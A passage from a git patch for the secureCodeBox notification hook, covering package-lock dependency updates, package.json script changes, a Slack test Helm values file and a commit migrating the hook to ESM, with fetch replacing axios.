"sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } + "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", + "dev": true }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", "dev": true, "requires": { - "ansi-regex": "^5.0.1" + "bare-events": "^2.2.0", + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" } }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, "supports-color": { "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", @@ -8942,65 +2526,38 @@ "has-flag": "^4.0.0" } }, - "tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "requires": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "dependencies": { - "minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==" - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", + "tar-fs": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", + "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", "dev": true, "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0", + "pump": "^3.0.0", + "tar-stream": "^3.1.5" } }, - "tmp": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.2.1.tgz", - "integrity": "sha512-76SUhtfqR2Ijn+xllcI5P1oyannHNHByD80W1q447gU3mp9G9PSpGdWmjUOHRDPiHYacIk66W7ubDTuPF3BEtQ==", + "tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "dev": true, "requires": { - "rimraf": "^3.0.0" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "tmp-promise": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/tmp-promise/-/tmp-promise-3.0.2.tgz", - "integrity": "sha512-OyCLAKU1HzBjL6Ev3gxUeraJNlbNingmi8IrHHEsYH8LTmEuhvYfqvhn2F/je+mjf4N58UmZ96OMEy1JanSCpA==", + "text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "dev": true, "requires": { - "tmp": "^0.2.0" + "b4a": "^1.6.4" } }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha1-3F5pjL0HkmW8c+A3doGk5Og/YW4=", - "dev": true - }, "to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", @@ -9010,194 +2567,52 @@ "is-number": "^7.0.0" } }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "ts-jest": { - "version": "29.0.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.0.5.tgz", - "integrity": "sha512-PL3UciSgIpQ7f6XjVOmbi96vmDHUqAyqDr8YxzopDqX3kfgYtX1cuNeBjP+L9sFXi6nzsGGA6R3fP3DDDJyrxA==", - "dev": true, - "requires": { - "bs-logger": "0.x", - "fast-json-stable-stringify": "2.x", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "4.x", - "make-error": "1.x", - "semver": "7.x", - "yargs-parser": "^21.0.1" - }, - "dependencies": { - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - } - } - }, - "tslib": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.5.0.tgz", - "integrity": "sha512-336iVw3rtn2BUK7ORdIAHTyxHGRIHVReokCR3XjbckJMK7ms8FysBfhLR8IXnAgy7T0PTPNBWKiH514FOW/WSg==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", "dev": true }, "typescript": { - "version": "4.3.5", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-4.3.5.tgz", - "integrity": "sha512-DqQgihaQ9cUrskJo9kIyW/+g0Vxsk8cDtZ52a3NGh0YNTfpUSArXSohyUGnvbPazEPLu398C0UxmKSOrPumUzA==", + "version": "5.8.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.8.3.tgz", + "integrity": "sha512-p1diW6TqL9L07nNxvRMM7hMMw4c5XOo/1ibL4aAIGmSAt9slTE1Xgw5KWuof2uTOvCg9BY7ZRi+GaF+7sfgPeQ==", "dev": true }, - "underscore": { - "version": "1.13.6", - "resolved": "https://registry.npmjs.org/underscore/-/underscore-1.13.6.tgz", - "integrity": "sha512-+A5Sja4HP1M08MaXya7p5LvjuM7K6q/2EaC0+iovj/wOcMsTzMvDFbasi/oSapiwOlt252IqsKqPjCl7huKS0A==" - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - }, - "v8-to-istanbul": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.0.1.tgz", - "integrity": "sha512-74Y4LqY74kLE6IFyIjPtkSTWzUZmj8tdHT9Ii/26dvQ6K9Dl2NbEfj0XgU2sHCtKgt5VupqhlO/5aWuqS+IY1w==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } + "undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "dev": true }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "dev": true }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", "dev": true, "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=" - }, - "ws": { - "version": "8.12.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.12.0.tgz", - "integrity": "sha512-kU62emKIdKVeEIOIKVegvqpXMSTAMLJozpHZaJNDYqBjzlSYXQGviYwN1osDLJ9av68qHd4a2oSjd7yD4pacig==", - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", "dev": true }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - }, - "yargs": { - "version": "17.6.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.6.2.tgz", - "integrity": "sha512-1/9UrdHjDZc0eOU0HxOHoS78C69UD3JRMvzlJ7S79S2nTaWRA/whGCTV8o9e/N/1Va9YIV7Q4sOxD8VV4pCWOw==", + "ws": { + "version": "8.18.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true + "requires": {} } } } diff --git a/hooks/notification/hook/package.json b/hooks/notification/hook/package.json index 3bd59a1d95..ca6edef208 100644 --- a/hooks/notification/hook/package.json +++ b/hooks/notification/hook/package.json @@ -4,8 +4,8 @@ "description": "secureCodeBox Hook for Notification", "main": "hook.js", "scripts": { - "build": "npx tsc hook.ts --sourceMap --esModuleInterop", - "test": "npm run build && npx ts-jest config:init && jest --verbose --ci --colors --coverage --passWithNoTests" + "lint": "npx tsc hook.ts --noEmit --skipLibCheck", + "build": "esbuild --platform=node --target=node22 --format=esm --outdir=./build/ --sourcemap *.ts" }, "repository": { "type": "git", @@ -23,23 +23,21 @@ }, "homepage": "https://github.com/secureCodeBox/secureCodeBox#readme", "devDependencies": { - "@types/jest": "^29.4.0", + "@types/jest": "^30.0.0", "@types/lodash": "^4.14.171", "@types/mustache": "^4.1.2", - "@types/node": "^16.0.0", + "@types/node": "^22.16.2", "@types/nodemailer": "^6.4.4", - "jest": "^29.3.1", - "typescript": "^4.3.5", - "@types/nunjucks": "^3.1.5", - "ts-jest": "^29.0.5" + "typescript": "^5.8.3", + "@kubernetes/client-node": "^1.3.0", + "@types/nunjucks": "^3.1.5" }, "dependencies": { - "@kubernetes/client-node": "^0.18.1", "@types/js-yaml": "^4.0.2", "axios": "^1.6.0", "js-yaml": "^4.1.0", "lodash": "^4.17.21", - "nodemailer": "^6.9.9", + "nodemailer": "^6.10.1", "nunjucks": "^3.2.4" } } diff --git a/hooks/notification/integration-tests/notification-hook-helm-values.yaml b/hooks/notification/integration-tests/notification-hook-helm-values.yaml new file mode 100644 index 0000000000..d5d223316e --- /dev/null +++ b/hooks/notification/integration-tests/notification-hook-helm-values.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +notificationChannels: + - name: slack + type: slack + template: slack-messageCard + rules: [] + endPoint: SLACK_ENDPOINT + +env: + - name: SLACK_ENDPOINT + value: "http://http-webhook.integration-tests.svc.cluster.local/slack-notification" diff --git a/tests/integration/helpers.ts b/tests/integration/helpers.ts index 16bb418940..e47cfd19ab 100644 --- a/tests/integration/helpers.ts +++ b/tests/integration/helpers.ts @@ -45,7 +45,7 @@ kc.loadFromOptions({ let k8sCRDApi: CustomObjectsApi, k8sBatchApi: BatchV1Api, k8sPodsApi: CoreV1Api; -function getKubernetesAPIs() { +export function getKubernetesAPIs() { if (!k8sCRDApi) { k8sCRDApi = kc.makeApiClient(CustomObjectsApi); } From 4d9a8a6e0a87643d1e5f374a24f6db042fce81a0 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 15:42:10 +0200 Subject: [PATCH 109/137] Migrate notification hook to esm and task --- .github/workflows/ci.yaml | 2 +- hooks/notification/Taskfile.yaml | 7 +- hooks/notification/hook/.gitignore | 10 + hooks/notification/hook/Dockerfile | 1 + hooks/notification/hook/Notifier.ts | 2 - hooks/notification/hook/NotifierFactory.ts | 27 +- .../hook/Notifiers/AbstractNotifier.ts | 16 +- .../hook/Notifiers/AbstractWebHookNotifier.ts | 34 +- .../hook/Notifiers/EMailNotifier.test.ts | 49 +- .../hook/Notifiers/EMailNotifier.ts | 25 +- .../hook/Notifiers/MSTeamsNotifier.test.ts | 45 +- .../hook/Notifiers/MSTeamsNotifier.ts | 11 +- .../notification/hook/Notifiers/RocketChat.ts | 11 +- .../hook/Notifiers/RocketChatNotifier.test.ts | 63 +- .../hook/Notifiers/SlackAppNotifier.test.ts | 37 +- .../hook/Notifiers/SlackAppNotifier.ts | 34 +- .../hook/Notifiers/SlackNotifier.test.ts | 23 +- .../hook/Notifiers/SlackNotifier.ts | 12 +- .../hook/Notifiers/TrelloNotifier.test.ts | 23 +- .../hook/Notifiers/TrelloNotifier.ts | 37 +- hooks/notification/hook/hook.ts | 11 +- hooks/notification/hook/package-lock.json | 853 ++++++++++++++++-- hooks/notification/hook/package.json | 16 +- .../notification-hook-helm-values.yaml | 2 +- 24 files changed, 1097 insertions(+), 254 deletions(-) create mode 100644 hooks/notification/hook/.gitignore diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index c1861a1eae..431effaa1b 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -580,7 +580,7 @@ jobs: # - persistence-dependencytrack # - update-field-hook - finding-post-processing - # - notification + - notification # - persistence-static-report (WIP) steps: - name: Checkout diff --git a/hooks/notification/Taskfile.yaml b/hooks/notification/Taskfile.yaml index 3d3d7c5408..d5bff70c30 100644 --- a/hooks/notification/Taskfile.yaml +++ b/hooks/notification/Taskfile.yaml @@ -9,9 +9,14 @@ includes: vars: hookName: notification additionalHelmInstallArgsForHook: | - --values=./integrations-tests/notification-hook-helm-values.yaml \ + --values={{ .TASKFILE_DIR }}/notification/integration-tests/notification-hook-helm-values.yaml \ + test-scan: + taskfile: ../../scanners/test-scan/Taskfile.yaml tasks: predeploy: deps: - demo-targets:deploy:http-webhook + cmds: + - task: test-scan:build + - task: test-scan:deploy \ No newline at end of file diff --git a/hooks/notification/hook/.gitignore b/hooks/notification/hook/.gitignore new file mode 100644 index 0000000000..fa06daa869 --- /dev/null +++ b/hooks/notification/hook/.gitignore @@ -0,0 +1,10 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +node_modules +*.map +**.js +!**.test.js +*.tar +build/ \ No newline at end of file diff --git a/hooks/notification/hook/Dockerfile b/hooks/notification/hook/Dockerfile index 0bbcc3f322..28186832f2 100644 --- a/hooks/notification/hook/Dockerfile +++ b/hooks/notification/hook/Dockerfile @@ -22,3 +22,4 @@ FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ COPY --from=install --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ COPY --from=build --chown=root:root --chmod=755 /home/app/build/ ./ +COPY --chown=root:root --chmod=755 notification-templates/ ./notification-templates/ diff --git a/hooks/notification/hook/Notifier.ts b/hooks/notification/hook/Notifier.ts index be9601087b..56500e8dbf 100644 --- a/hooks/notification/hook/Notifier.ts +++ b/hooks/notification/hook/Notifier.ts @@ -2,8 +2,6 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Finding } from "./model/Finding"; - export interface Notifier { /** * Sends a Notification Message to the desired End-Point (e.g. Slack or MS Teams) diff --git a/hooks/notification/hook/NotifierFactory.ts b/hooks/notification/hook/NotifierFactory.ts index 82dbb76507..8e05ad381d 100644 --- a/hooks/notification/hook/NotifierFactory.ts +++ b/hooks/notification/hook/NotifierFactory.ts @@ -2,17 +2,20 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Notifier } from "./Notifier"; -import { NotifierType } from "./NotifierType"; -import { SlackNotifier } from "./Notifiers/SlackNotifier"; -import { SlackAppNotifier } from "./Notifiers/SlackAppNotifier"; -import { EMailNotifier } from "./Notifiers/EMailNotifier"; -import { MSTeamsNotifier } from "./Notifiers/MSTeamsNotifier"; -import { TrelloNotifier } from "./Notifiers/TrelloNotifier"; -import { NotificationChannel } from "./model/NotificationChannel"; -import { Scan } from "./model/Scan"; -import { Finding } from "./model/Finding"; -import { RocketChatNotifier } from "./Notifiers/RocketChat"; +import { createTransport } from "nodemailer"; + +import { NotifierType } from "./NotifierType.js"; +import { SlackNotifier } from "./Notifiers/SlackNotifier.js"; +import { SlackAppNotifier } from "./Notifiers/SlackAppNotifier.js"; +import { EMailNotifier } from "./Notifiers/EMailNotifier.js"; +import { MSTeamsNotifier } from "./Notifiers/MSTeamsNotifier.js"; +import { TrelloNotifier } from "./Notifiers/TrelloNotifier.js"; +import { NotificationChannel } from "./model/NotificationChannel.js"; +import { RocketChatNotifier } from "./Notifiers/RocketChat.js"; + +import type { Notifier } from "./Notifier"; +import type { Scan } from "./model/Scan"; +import type { Finding } from "./model/Finding"; export class NotifierFactory { static create( @@ -25,7 +28,7 @@ export class NotifierFactory { case NotifierType.SLACK: return new SlackNotifier(channel, scan, findings, args); case NotifierType.EMAIL: - return new EMailNotifier(channel, scan, findings, args); + return new EMailNotifier(channel, scan, findings, args, createTransport); case NotifierType.SLACK_APP: return new SlackAppNotifier(channel, scan, findings, args); case NotifierType.MS_TEAMS: diff --git a/hooks/notification/hook/Notifiers/AbstractNotifier.ts b/hooks/notification/hook/Notifiers/AbstractNotifier.ts index 2a5aff3ee5..86a978b423 100644 --- a/hooks/notification/hook/Notifiers/AbstractNotifier.ts +++ b/hooks/notification/hook/Notifiers/AbstractNotifier.ts @@ -2,18 +2,20 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Notifier } from "../Notifier"; -import { NotifierType } from "../NotifierType"; -import { Finding } from "../model/Finding"; -import { NotificationChannel } from "../model/NotificationChannel"; import * as jsyaml from "js-yaml"; -import { Scan } from "../model/Scan"; import * as path from "path"; -import * as nunjucks from "nunjucks"; +import nunjucks from "nunjucks"; + +import { Notifier } from "../Notifier.js"; +import { NotifierType } from "../NotifierType.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; export abstract class AbstractNotifier implements Notifier { private static readonly TEMPLATE_DIR: string = path.join( - __dirname, + import.meta.dirname, "../notification-templates", ); private static readonly TEMPLATE_FILE_TYPE = "njk"; diff --git a/hooks/notification/hook/Notifiers/AbstractWebHookNotifier.ts b/hooks/notification/hook/Notifiers/AbstractWebHookNotifier.ts index 6b6707f72d..f446dea87b 100644 --- a/hooks/notification/hook/Notifiers/AbstractWebHookNotifier.ts +++ b/hooks/notification/hook/Notifiers/AbstractWebHookNotifier.ts @@ -1,13 +1,18 @@ // SPDX-FileCopyrightText: the secureCodeBox authors // // SPDX-License-Identifier: Apache-2.0 -import axios from "axios"; -import { Scan } from "../model/Scan"; -import { Finding } from "../model/Finding"; -import { NotifierType } from "../NotifierType"; -import type { AxiosRequestConfig } from "axios"; -import { AbstractNotifier } from "./AbstractNotifier"; -import { NotificationChannel } from "../model/NotificationChannel"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractNotifier } from "./AbstractNotifier.js"; + +import type { Scan } from "../model/Scan"; +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; + +export interface FetchRequestOptions { + method?: string; + headers?: Record; + body?: string; +} export abstract class AbstractWebHookNotifier extends AbstractNotifier { protected abstract type: NotifierType; @@ -27,13 +32,20 @@ export abstract class AbstractWebHookNotifier extends AbstractNotifier { protected async sendPostRequest( message: string, - options?: AxiosRequestConfig, + options?: FetchRequestOptions, ) { try { - const response = await axios.post( + const response = await fetch( this.resolveEndPoint(), - message, - options, + { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + ...(options?.headers || {}) + }, + body: message, + ...options + } ); console.log( `Notifier sent out request for notification, got response code: ${response.status}`, diff --git a/hooks/notification/hook/Notifiers/EMailNotifier.test.ts b/hooks/notification/hook/Notifiers/EMailNotifier.test.ts index ce6a6f18e1..413a364203 100644 --- a/hooks/notification/hook/Notifiers/EMailNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/EMailNotifier.test.ts @@ -6,20 +6,17 @@ import { NotifierType } from "../NotifierType"; import { EMailNotifier } from "./EMailNotifier"; import { NotificationChannel } from "../model/NotificationChannel"; import { Scan } from "../model/Scan"; +import type { createTransport as createTransportType } from "nodemailer"; const sendMail = jest.fn(); const close = jest.fn(); -jest.mock("nodemailer", () => { +let createTransport = jest.fn(() => { return { - createTransport: () => { - return { - sendMail, - close, - }; - }, + sendMail, + close, }; -}); +}) as unknown as typeof createTransportType; const creationTimestamp = new Date("2021-01-01T14:29:25Z"); @@ -82,13 +79,14 @@ test("Should Send Mail", async () => { const args = new Array(); args[EMailNotifier.EMAIL_FROM] = from; - const notifier = new EMailNotifier(channel, scan, [], args); + const notifier = new EMailNotifier(channel, scan, [], args, createTransport); await notifier.sendMessage(); - expect(sendMail).toHaveBeenCalledWith({ - from: "secureCodeBox", - html: `Scan demo-scan-1601086432
+ expect(sendMail).toHaveBeenCalledWith( + expect.objectContaining({ + from: "secureCodeBox", + html: `Scan demo-scan-1601086432
